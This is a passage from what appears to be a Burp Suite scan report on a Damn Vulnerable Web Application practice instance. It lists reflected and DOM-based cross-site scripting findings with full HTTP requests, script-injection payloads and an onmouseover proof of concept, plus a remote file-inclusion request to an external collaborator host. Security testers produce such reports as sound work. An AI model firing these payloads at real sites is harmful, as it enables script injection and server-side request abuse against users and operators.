Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowf8d42'%3e%3cscript%3ealert(1)%3c%2fscript%3efgv4p; PHPSESSID=d23daf4c260b8527afd506bf5f9e5077
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:42:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5507
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/sqli_blind/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header in
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=sqli_blind&security=lowf8d42'><script>alert(1)</script>fgv4p&locale=en' )">
...[SNIP]...
5.21. https://pentest-ground.com:4280/vulnerabilities/upload/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload er61y'><script>alert(1)</script>bczn2j3mrfq was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/upload/?MAX_FILE_SIZE=100000&uploaded=Wx808VIClA&Upload=Upload HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lower61y'%3e%3cscript%3ealert(1)%3c%2fscript%3ebczn2j3mrfq; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:44:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=upload&security=lower61y'><script>alert(1)</script>bczn2j3mrfq&locale=en' )">
...[SNIP]...
5.22. https://pentest-ground.com:4280/vulnerabilities/weak_id/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload n8rdt'><script>alert(1)</script>nl78wbuejlw was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
The original request used a Content-type header which it is not possible to generate using a standard HTML form. It was possible to replace this header with a standard value, to facilitate cross-domain delivery of an exploit.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lown8rdt'%3e%3cscript%3ealert(1)%3c%2fscript%3enl78wbuejlw; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-type: text/plain
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3520
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=084399cd7a917dff551fbe0930dc9f4717d5920e; expires=Mon, 21 Oct 2024 10:47:38 GMT; Max-Age=3600; path=/vulnerabilities/weak_id/; domain=pentest-ground.com; secure; HttpOnly
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=weak_id&security=lown8rdt'><script>alert(1)</script>nl78wbuejlw&locale=en' )">
...[SNIP]...
5.23. https://pentest-ground.com:4280/vulnerabilities/xss_d/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload jkupd'><script>alert(1)</script>utvyv was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowjkupd'%3e%3cscript%3ealert(1)%3c%2fscript%3eutvyv; PHPSESSID=a41b29b87c4b3d8b45a7685b6e4911ec
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:10 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4684
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_d&security=lowjkupd'><script>alert(1)</script>utvyv&locale=en' )">
...[SNIP]...
5.24. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload npja0'><script>alert(1)</script>bb940 was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lownpja0'%3e%3cscript%3ealert(1)%3c%2fscript%3ebb940; PHPSESSID=8541ed0d285b32dcaacfa09899f20c08
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5284
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/xss_r/source/impossible.php</b> on line <b>6</b><br />
<br />
<b>Warning</b>: Cannot modify header informa
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_r&security=lownpja0'><script>alert(1)</script>bb940&locale=en' )">
...[SNIP]...
5.25. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fagfe'><script>alert(1)</script>jzddcud3s1a was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/xss_s/?txtName=RUYsQw&mtxMessage=RUYsQw&btnSign=Sign+Guestbook HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowfagfe'%3e%3cscript%3ealert(1)%3c%2fscript%3ejzddcud3s1a; PHPSESSID=933b6f5d77a1bf9fb89717afcbd9a537
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:06:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 53479
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_s&security=lowfagfe'><script>alert(1)</script>jzddcud3s1a&locale=en' )">
...[SNIP]...
5.26. https://pentest-ground.com:4280/vulnerabilities/fi/ [Referer HTTP header]
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload iadnu<script>alert(1)</script>nfjvp was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behavior is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.phpiadnu<script>alert(1)</script>nfjvp
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4483
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.phpiadnu<script>alert(1)</script>nfjvp</em>
...[SNIP]...
5.27. https://pentest-ground.com:4280/vulnerabilities/fi/ [User-Agent HTTP header]
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload t1nv7<script>alert(1)</script>bgj8m was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behavior is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36t1nv7<script>alert(1)</script>bgj8m
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4483
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36t1nv7<script>alert(1)</script>bgj8m</em>
...[SNIP]...
6. Cross-site scripting (DOM-based)
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Issue detail
The application may be vulnerable to DOM-based cross-site scripting. Data is read from location.href and passed to document.write.
Issue background
DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.
DOM-based cross-site scripting arises when a script writes controllable data into the HTML document in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to visit the attacker's crafted URL in various ways, similar to the usual attack delivery vectors for reflected cross-site scripting vulnerabilities.
Burp Suite automatically identifies this issue using dynamic and static code analysis. Static analysis can lead to false positives that are not actually exploitable. If Burp Scanner has not provided any evidence resulting from dynamic analysis, you should review the relevant code and execution paths to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.
Issue remediation
The most effective way to avoid DOM-based cross-site scripting vulnerabilities is not to dynamically write data from any untrusted source into the HTML document. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing script code into the document. In many cases, the relevant data can be validated on a whitelist basis, to allow only content that is known to be safe. In other cases, it will be necessary to sanitize or encode the data. This can be a complex task, and depending on the context that the data is to be inserted may need to involve a combination of JavaScript escaping, HTML encoding, and URL encoding, in the appropriate sequence.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3b16130fb79125ad39c31a7a5f28589
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
Dynamic analysis
Data is read from location.href and passed to document.write.
The following value was injected into the source:
https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=s06bg0fkob%27%22`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&Spanish#s06bg0fkob=s06bg0fkob%27%22`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&
The previous value reached the sink as:
<option value='s06bg0fkob%27%22`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&Spanish#s06bg0fkob=s06bg0fkob%27%22`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&'>s06bg0fkob'"`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&Spanish#s06bg0fkob=s06bg0fkob'"`'"/s06bg0fkob/><s06bg0fkob/\>rssejjxv7x&</option>
The stack trace at the source was:
at Object._0x165f99 [as proxiedGetterCallback] (<anonymous>:1:557377)
at get href (<anonymous>:1:249544)
at https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=Spanish:70:36
The stack trace at the sink was:
at Object.XMhUr (<anonymous>:1:544502)
at _0x13dcf0 (<anonymous>:1:558761)
at HTMLDocument.write (<anonymous>:1:466007)
at https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=Spanish:71:16
The following proof of concept was generated for this issue:
https://pentest-ground.com:4280/vulnerabilities/xss_d/?default='"/onmouseover=alert(1)//Spanish#'"/onmouseover=alert(1)//
7. External service interaction (HTTP)
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
It is possible to induce the application to perform server-side HTTP and HTTPS requests to arbitrary domains.
The payload http://u1wxpxfnwq9i8zjtzra90mgp3g99x4lu9lwbk0.oastify.com/?file1.php was submitted in the page parameter.
The application performed an HTTP request to the specified domain.
Issue background
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application.
However, in many cases, it can indicate a vulnerability with serious consequences.
The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy.
By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with.
This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself.
Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.
Issue remediation
You should review the purpose and intended use of the relevant application functionality,
and determine whether the ability to trigger arbitrary external service interactions is intended behavior.
If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures.
These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.
If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.
Out-of-Band Application Security Testing (OAST) is highly effective at uncovering high-risk features, to the point where finding the root cause of an interaction can be quite challenging. To find the source of an external service interaction, try to identify whether it is triggered by specific application functionality, or occurs indiscriminately on all requests. If it occurs on all endpoints, a front-end CDN or application firewall may be responsible, or a back-end analytics system parsing server logs. In some cases, interactions may originate from third-party systems; for example, a HTTP request may trigger a poisoned email which passes through a link-scanner on its way to the recipient.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/fi/?page=http%3a%2f%2fu1wxpxfnwq9i8zjtzra90mgp3g99x4lu9lwbk0.oastify.com%2f%3ffile1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 3975
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<html><body>vgsii9v5kr93m8q3ai58vfzjlgngigjfigz</body></html><br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at http://u1wxpxfnwq9i8zjtzra90mgp3g99x4
...[SNIP]...
Collaborator HTTP interaction
The Collaborator server received an HTTP request.
The request was received from IP address 178.79.134.182:53188 at 2024-Oct-21 09:45:23.725 UTC.Request to Collaborator
GET /?file1.php HTTP/1.1
Host: u1wxpxfnwq9i8zjtzra90mgp3g99x4lu9lwbk0.oastify.com
Connection: close
Response from Collaborator
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 61
<html><body>vgsii9v5kr93m8q3ai58vfzjlgngigjfigz</body></html>
8. TLS cookie without secure flag set
Previous
Next
There are 2 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain that issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.
Issue remediation
